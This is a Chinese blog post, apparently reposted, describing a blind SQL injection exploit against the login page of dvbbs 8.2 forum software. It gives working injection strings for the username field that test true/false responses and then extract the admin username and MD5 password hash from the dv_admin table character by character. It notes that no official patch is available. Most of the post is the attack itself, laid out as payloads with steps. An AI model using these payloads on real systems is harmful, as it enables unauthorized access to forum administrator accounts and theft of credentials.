注册 发表

新博:3abc.blogbus.com

NOTICE |

dvbbs 8.2 注入漏洞利用 - [技术文档]

版权声明:转载时请以超链接形式标明文章原始出处和作者信息及本声明
http://diys.blogbus.com/logs/22330482.html

dvbbs 8.2 注入漏洞利用


漏洞利用:(access版)
由于使用验证码,该漏洞只能纯手工进行注入尝试,在用户登陆页面,用户名处构造sql语句
如:
判断
Where' and '1'='1

where' and '1'='2
密码任意6位,输入验证码,根据返回信息,第一条显示用户名或密码错误第二条显示无此用户,猜解用户
where' and 1=(select count(*) from dv_admin where left(username,1)='a') and '1'='1
where' and 1=(select count(*) from dv_admin where left(username,2)='ad') and '1'='1
………………………
猜解密码(md5加密)
where' and 1=(select count(*) from dv_admin where left(password,1)='1') and '1'='1
where' and 1=(select count(*) from dv_admin where left(password,2)='15') and '1'='1
……………………
……………………
…………………..
简单测试官方sql版也存在漏洞,利用过程不写了

相关信息:
Dvbbs官方 http://www.dvbbs.net
补丁:
目前官方没有任何补丁,请等待升级补丁




收藏到:Del.icio.us




top
编辑 | 继续话题 | 转载 | 分享 0
Skin By Mytube and Mysekai.cn Total: